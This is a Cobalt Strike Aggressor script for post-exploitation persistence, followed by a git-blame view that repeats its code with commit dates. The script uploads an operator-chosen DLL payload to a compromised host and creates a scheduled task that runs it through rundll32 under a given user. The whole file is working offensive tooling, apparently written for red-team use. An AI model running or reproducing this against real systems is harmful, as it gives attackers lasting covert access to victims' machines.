AggressorScripts/Persistence/UserSchtasksPersist.cna

#User Schtasks Persistence
#Author: @r3dQu1nn
#Runs as current user for the selected beacon
#Meant for quick user level persistence upon initial access
#Thanks to @noone and bluescreenofjeff for help

sub persistUserSchtasks  {
	$bid = $1;
	$dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({
		if ("$3['taskname']" ismatch 'Evil Task Name..' || "$3['targetpath']" ismatch 'Target Path..' || "$3['payloadfile']" ismatch 'Select DLL Payload..' || "$3['user']" ismatch 'User to Run as..' || "$3['schedule']" ismatch 'Schedule modifier..') {
			berror($bid, "\c4Please enter a valid Task Name, Target Path, Schedule Modifier, and a valid Payload File.");
			break;
		}
		else {
			bcd($bid, $3['targetpath']);
			bupload($bid, $3['payloadfile']);
			bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');
			bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');
		}
	}));

	dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");
	
	drow_text($dialog, "taskname",  "Schtasks Taskname:");
	drow_text($dialog, "user", "User to Run as:");
	drow_text($dialog, "targetpath", "Target Path:");
	drow_text($dialog, "schedule", "Schedule Modifier:");
	drow_file($dialog, "payloadfile", "DLL Payload:");
	
	dbutton_action($dialog, "Create");
	dialog_show($dialog);

}

popup beacon_bottom {
	item "User Schtasks Persistence" {
		persistUserSchtasks($1);
	}
}
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00			`#User Schtasks Persistence`
Update UserSchtasksPersist.cna 2017-05-20 08:09:33 +00:00			`#Author: @r3dQu1nn`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00			`#Runs as current user for the selected beacon`
			`#Meant for quick user level persistence upon initial access`
			`#Thanks to @noone and bluescreenofjeff for help`

			`sub persistUserSchtasks {`
			`$bid = $1;`
Added Schedule Modifier field 2017-05-08 11:19:00 +00:00			`$dialog = dialog("User Schtasks Persistence", %(taskname => "Evil Task Name..", targetpath => "Target Path..", user => "User to Run as..", schedule => "Schedule modifier..", payloadfile => "Select DLL Payload.."), lambda({`
			`if ("$3['taskname']" ismatch 'Evil Task Name..' \|\| "$3['targetpath']" ismatch 'Target Path..' \|\| "$3['payloadfile']" ismatch 'Select DLL Payload..' \|\| "$3['user']" ismatch 'User to Run as..' \|\| "$3['schedule']" ismatch 'Schedule modifier..') {`
Added Schedule modifier field 2017-05-08 11:20:27 +00:00			`berror($bid, "\c4Please enter a valid Task Name, Target Path, Schedule Modifier, and a valid Payload File.");`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00			`break;`
			`}`
			`else {`
			`bcd($bid, $3['targetpath']);`
			`bupload($bid, $3['payloadfile']);`
Updated with PowerPick 2018-02-09 19:46:57 +00:00			`bpowerpick($bid, 'schtasks /create /tn "'.$3['taskname'].'" /tr "C:\Windows\System32\rundll32.exe '.$3['targetpath']."\\".split("/",$3['payloadfile'])[-1].',StartW" /ru "'.$3['user'].'" /sc "'.$3['schedule'].'"');`
			`bpowerpick($bid, 'schtasks /query /v /tn "'.$3['taskname'].'" /FO list');`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00			`}`
			`}));`

Fixed syntax errors added user to run as 2017-05-03 17:58:20 +00:00			`dialog_description($dialog, "User Schtasks Persistence - Generates a schtask for persistence on selected beacon.");`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00
			`drow_text($dialog, "taskname", "Schtasks Taskname:");`
Fixed syntax errors added user to run as 2017-05-03 17:58:20 +00:00			`drow_text($dialog, "user", "User to Run as:");`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00			`drow_text($dialog, "targetpath", "Target Path:");`
Added Schedule Modifier field 2017-05-08 11:19:00 +00:00			`drow_text($dialog, "schedule", "Schedule Modifier:");`
Updated Payload File 2017-05-03 13:33:07 +00:00			`drow_file($dialog, "payloadfile", "DLL Payload:");`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00
Updated Payload File to DLL 2017-05-03 14:35:22 +00:00			`dbutton_action($dialog, "Create");`
UserSchtasksPersist.cna custom dialog persistence 2017-05-03 12:56:59 +00:00			`dialog_show($dialog);`

			`}`

			`popup beacon_bottom {`
			`item "User Schtasks Persistence" {`
			`persistUserSchtasks($1);`
			`}`
			`}`